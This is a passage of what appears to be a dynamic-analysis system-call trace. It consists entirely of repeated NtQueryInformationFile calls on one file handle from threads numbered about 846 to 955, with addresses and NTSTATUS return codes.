FileHandle=0x194, IoStatusBlock=0x35dfb30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb30, FileInformation=0x210e20) returned 0xc00000bb Thread: id = 846 os_tid = 0xb4c [0162.792] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb90, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 847 os_tid = 0xa1c [0162.794] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd38, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 848 os_tid = 0x2ac [0162.799] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe78, FileInformation=0x210e20) returned 0x0 Thread: id = 849 os_tid = 0xa8c [0162.801] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe10, FileInformation=0x210e20) returned 0x0 Thread: id = 850 os_tid = 0x68c [0162.803] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfbf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfbf8, FileInformation=0x210e20) returned 0x0 Thread: id = 851 os_tid = 0x388 [0162.805] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff28, FileInformation=0x210e20) returned 0x0 Thread: id = 852 os_tid = 0xa50 [0162.807] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfee0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfee0, FileInformation=0x210e20) returned 0x0 Thread: id = 853 os_tid = 0x75c [0162.809] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff28, FileInformation=0x210e20) returned 0x0 Thread: id = 854 os_tid = 0x240 [0162.819] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffdb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffdb0, FileInformation=0x210e20) returned 0x0 Thread: id = 855 os_tid = 0x320 [0162.822] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf790, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf790, FileInformation=0x210e20) returned 0x0 Thread: id = 856 os_tid = 0x3b4 [0162.824] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f968, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f968, FileInformation=0x210e20) returned 0x0 Thread: id = 857 os_tid = 0x760 [0162.828] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7e8, FileInformation=0x210e20) returned 0x0 Thread: id = 858 os_tid = 0xb00 [0162.831] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfea8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfea8, FileInformation=0x210e20) returned 0x0 Thread: id = 859 os_tid = 0x7fc [0162.833] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 860 os_tid = 0xb18 [0162.834] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb18, FileInformation=0x210e20) returned 0x0 Thread: id = 861 os_tid = 0xa68 [0162.836] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfb80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfb80, FileInformation=0x210e20) returned 0x0 Thread: id = 862 os_tid = 0x224 [0162.838] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fbb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fbb8, FileInformation=0x210e20) returned 0x0 Thread: id = 863 os_tid = 0x2c4 [0162.840] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f930, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f930, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 864 os_tid = 0x24c [0162.845] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb60, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 865 os_tid = 0x4e8 [0162.847] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc58, FileInformation=0x210e20) returned 0x0 Thread: id = 866 os_tid = 0x220 [0162.858] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe58, FileInformation=0x210e20) returned 0x0 Thread: id = 867 os_tid = 0xb04 [0162.862] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fcc8, FileInformation=0x210e20) returned 0x0 Thread: id = 868 os_tid = 0x180 [0162.864] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb00, FileInformation=0x210e20) returned 0x0 Thread: id = 869 os_tid = 0x53c [0162.870] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f808, FileInformation=0x210e20) returned 0x0 Thread: id = 870 os_tid = 0x5b4 [0162.872] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fac8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fac8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 871 os_tid = 0x614 [0162.874] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f9f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f9f8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 872 os_tid = 0x690 [0162.876] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb08, FileInformation=0x210e20) returned 0x0 Thread: id = 873 os_tid = 0x440 [0162.878] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff10, FileInformation=0x210e20) returned 0x0 Thread: id = 874 os_tid = 0x7d8 [0162.880] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc00, FileInformation=0x210e20) returned 0x0 Thread: id = 875 os_tid = 0xa60 [0162.882] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df8e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df8e8, FileInformation=0x210e20) returned 0x0 Thread: id = 876 os_tid = 0xb24 [0162.884] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffef0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffef0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 877 os_tid = 0x878 [0162.885] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf7b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf7b0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 878 os_tid = 0xb1c [0162.887] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fe98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fe98, FileInformation=0x210e20) returned 0x0 Thread: id = 879 os_tid = 0xb08 [0162.889] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fef0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fef0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 880 os_tid = 0x4fc [0162.892] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb18, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 881 os_tid = 0x4dc [0162.894] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfdf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfdf0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 882 os_tid = 0x43c [0162.896] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fbb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fbb0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 883 os_tid = 0x1c4 [0162.901] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fa10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fa10, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 884 os_tid = 0xbec [0162.904] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f7e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f7e8, FileInformation=0x210e20) returned 0x0 Thread: id = 885 os_tid = 0xb48 [0162.906] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f918, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f918, FileInformation=0x210e20) returned 0x0 Thread: id = 886 os_tid = 0x5bc [0162.909] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe28, FileInformation=0x210e20) returned 0x0 Thread: id = 887 os_tid = 0x6b8 [0162.911] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc20, FileInformation=0x210e20) returned 0x0 Thread: id = 888 os_tid = 0x2dc [0162.913] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa60, FileInformation=0x210e20) returned 0x0 Thread: id = 889 os_tid = 0x158 [0162.915] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfaa8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfaa8, FileInformation=0x210e20) returned 0x0 Thread: id = 890 os_tid = 0x6cc [0162.917] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbf8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 891 os_tid = 0x694 [0162.919] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f888, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 892 os_tid = 0x6d8 [0162.921] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa30, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 893 os_tid = 0x87c [0162.923] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff60, FileInformation=0x210e20) returned 0x0 Thread: id = 894 os_tid = 0xb88 [0162.925] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe98, FileInformation=0x210e20) returned 0x0 Thread: id = 895 os_tid = 0xb8c [0162.927] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f920, FileInformation=0x210e20) returned 0x0 Thread: id = 896 os_tid = 0x700 [0162.929] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff978, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff978, FileInformation=0x210e20) returned 0x0 Thread: id = 897 os_tid = 0x6f0 [0162.931] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357feb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357feb8, FileInformation=0x210e20) returned 0x0 Thread: id = 898 os_tid = 0x130 [0162.933] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fa10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fa10, FileInformation=0x210e20) returned 0x0 Thread: id = 899 os_tid = 0x754 [0162.935] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fdd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fdd0, FileInformation=0x210e20) returned 0x0 Thread: id = 900 os_tid = 0x72c [0162.937] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f790, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f790, FileInformation=0x210e20) returned 0x0 Thread: id = 901 os_tid = 0x748 [0162.938] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f7a8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 902 os_tid = 0x928 [0162.940] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff48, FileInformation=0x210e20) returned 0x0 Thread: id = 903 os_tid = 0xcc [0162.942] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc80, FileInformation=0x210e20) returned 0x0 Thread: id = 904 os_tid = 0xd0 [0162.944] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 905 os_tid = 0xd4 [0162.946] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe70, FileInformation=0x210e20) returned 0x0 Thread: id = 906 os_tid = 0xd8 [0162.948] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fac8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fac8, FileInformation=0x210e20) returned 0x0 Thread: id = 907 os_tid = 0xdc [0162.950] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfa28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfa28, FileInformation=0x210e20) returned 0x0 Thread: id = 908 os_tid = 0xe0 [0162.952] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffec0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffec0, FileInformation=0x210e20) returned 0x0 Thread: id = 909 os_tid = 0xe4 [0162.953] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffea8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffea8, FileInformation=0x210e20) returned 0x0 Thread: id = 910 os_tid = 0xe8 [0162.955] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe90, FileInformation=0x210e20) returned 0x0 Thread: id = 911 os_tid = 0xec [0162.957] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfea0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfea0, FileInformation=0x210e20) returned 0x0 Thread: id = 912 os_tid = 0x9d8 [0162.959] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f840, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f840, FileInformation=0x210e20) returned 0x0 Thread: id = 913 os_tid = 0x898 [0162.961] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f960, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f960, FileInformation=0x210e20) returned 0x0 Thread: id = 914 os_tid = 0x48c [0162.963] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df850, FileInformation=0x210e20) returned 0x0 Thread: id = 915 os_tid = 0x6a4 [0162.964] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb90, FileInformation=0x210e20) returned 0x0 Thread: id = 916 os_tid = 0x20c [0162.966] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7a0, FileInformation=0x210e20) returned 0x0 Thread: id = 917 os_tid = 0x704 [0162.968] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff08, FileInformation=0x210e20) returned 0x0 Thread: id = 918 os_tid = 0x568 [0162.970] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfde0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfde0, FileInformation=0x210e20) returned 0x0 Thread: id = 919 os_tid = 0x5ac [0162.972] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf7a0, FileInformation=0x210e20) returned 0x0 Thread: id = 920 os_tid = 0x908 [0162.974] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff7b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff7b0, FileInformation=0x210e20) returned 0x0 Thread: id = 921 os_tid = 0x888 [0162.976] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa60, FileInformation=0x210e20) returned 0x0 Thread: id = 922 os_tid = 0x544 [0162.978] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 923 os_tid = 0x76c [0162.980] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb18, FileInformation=0x210e20) returned 0x0 Thread: id = 924 os_tid = 0xa9c [0162.982] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff18, FileInformation=0x210e20) returned 0x0 Thread: id = 925 os_tid = 0x114 [0162.984] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa48, FileInformation=0x210e20) returned 0x0 Thread: id = 926 os_tid = 0x5b8 [0162.986] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f958, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f958, FileInformation=0x210e20) returned 0x0 Thread: id = 927 os_tid = 0x814 [0162.988] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f880, FileInformation=0x210e20) returned 0x0 Thread: id = 928 os_tid = 0x834 [0162.990] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fbe8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fbe8, FileInformation=0x210e20) returned 0x0 Thread: id = 929 os_tid = 0x884 [0162.992] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc88, FileInformation=0x210e20) returned 0x0 Thread: id = 930 os_tid = 0x5d4 [0162.993] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fdf8, FileInformation=0x210e20) returned 0x0 Thread: id = 931 os_tid = 0x340 [0162.996] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fee8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fee8, FileInformation=0x210e20) returned 0x0 Thread: id = 932 os_tid = 0x810 [0162.998] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff858, FileInformation=0x210e20) returned 0x0 Thread: id = 933 os_tid = 0x830 [0163.000] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe18, FileInformation=0x210e20) returned 0x0 Thread: id = 934 os_tid = 0x880 [0163.002] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f7a0, FileInformation=0x210e20) returned 0x0 Thread: id = 935 os_tid = 0xae4 [0163.004] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc40, FileInformation=0x210e20) returned 0x0 Thread: id = 936 os_tid = 0x570 [0163.006] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f9e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f9e8, FileInformation=0x210e20) returned 0x0 Thread: id = 937 os_tid = 0xb40 [0163.008] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fda8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fda8, FileInformation=0x210e20) returned 0x0 Thread: id = 938 os_tid = 0x5f4 [0163.010] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd08, FileInformation=0x210e20) returned 0x0 Thread: id = 939 os_tid = 0xbb8 [0163.012] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe18, FileInformation=0x210e20) returned 0x0 Thread: id = 940 os_tid = 0x598 [0163.014] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f818, FileInformation=0x210e20) returned 0x0 Thread: id = 941 os_tid = 0x4e4 [0163.016] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfeb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfeb0, FileInformation=0x210e20) returned 0x0 Thread: id = 942 os_tid = 0xbfc [0163.017] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfa78, FileInformation=0x210e20) returned 0x0 Thread: id = 943 os_tid = 0x80c [0163.019] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe48, FileInformation=0x210e20) returned 0x0 Thread: id = 944 os_tid = 0xbf8 [0163.021] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f7d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f7d0, FileInformation=0x210e20) returned 0x0 Thread: id = 945 os_tid = 0x524 [0163.023] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc30, FileInformation=0x210e20) returned 0x0 Thread: id = 946 os_tid = 0x674 [0163.026] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe38, FileInformation=0x210e20) returned 0x0 Thread: id = 947 os_tid = 0x4a0 [0163.027] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc48, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 948 os_tid = 0x5d8 [0163.033] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa20, FileInformation=0x210e20) returned 0x0 Thread: id = 949 os_tid = 0x69c [0163.035] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f980, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f980, FileInformation=0x210e20) returned 0x0 Thread: id = 950 os_tid = 0x6a8 [0163.037] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 951 os_tid = 0x500 [0163.039] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 952 os_tid = 0x4e0 [0163.041] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fba0, FileInformation=0x210e20) returned 0x0 Thread: id = 953 os_tid = 0x330 [0163.043] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fcb0, FileInformation=0x210e20) returned 0x0 Thread: id = 954 os_tid = 0xa30 [0163.045] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fbd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fbd8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 955 os_tid = 0xb50 [0163.047] NtQueryInformationFile (in: 